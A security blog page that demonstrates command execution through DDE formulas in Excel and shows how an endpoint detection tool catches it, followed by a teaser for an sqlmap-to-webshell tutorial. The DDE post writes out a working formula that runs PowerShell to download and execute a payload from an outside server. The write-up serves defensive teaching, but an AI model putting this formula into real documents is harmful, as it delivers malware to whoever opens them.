MS Excel Command Execution Without Macros

There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other office documents) without the need of Macros.

The method uses Dynamic Data Exchange (DDE), and what makes it interesting is that, even though it does causes prompt messages to appear, it doesn’t use Macros and therefore it is less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a “feature” and not a vulnerability, it is not something that will be patched, and cannot be easily prevented and blocked.

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

 

 

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:

=cmd|’ /c notepad’!A0

Once the user opens the file and accepts the prompts, notepad.exe will be launched.

To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload “YGH.exe” is hosted on the “192.168.1.3” server):

=cmd|’/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\”http://192.168.1.3/YGH.exe\”,\”c:\\Users\Public\\YGH.exe\”);Start-Process \”c:\\Users\\Public\\YGH.exe\”‘!A0

 

Once the victim opens the file, this is what he sees:

 

After accepting the 1st warning message, he sees a 2nd warning:

 

And finally the payload gets downloaded and executed:

In a real life scenario, the malware would have done something more stealthy, or provided remote access to the attacker instead of displaying a message.

 

 

 

Detection Using RSA NetWitness Endpoint (EDR)

Now, from the RSA NetWitness Endpoint view, this would be detected very easily.

  1. IIOCs are triggered for Office running PowerShell and PowerShell downloading content. This could be used to generate real-time alerts via email and/or Syslog and get notified at an early stage of the attack.
  2. Excel is executed
  3. Excel launches “cmd.exe”. From the command arguments we can see that cmd is used to launch powershell to download and execute a file called “YGH.exe” from the “192.168.1.3” server.
  4. PowerShell saves the YGH.exe file to disk
  5. PowerShell executed the YGH.exe file

 

 

This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user’s workstation.

This has been detected even though Excel is an approved software with a valid trusted signature and the malware itself didn’t perform any malicious activity (it only shows a message to the victim). It demonstrates early detection capabilities based on behavior before negative impact actually happens.

From SQL Injection to WebShell

An SQL Injection attack is not only limited to dumping a database, but can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells can receive commands from the attackers mainly using 2 methods:

  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs

In this tutorial we will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.

Continue reading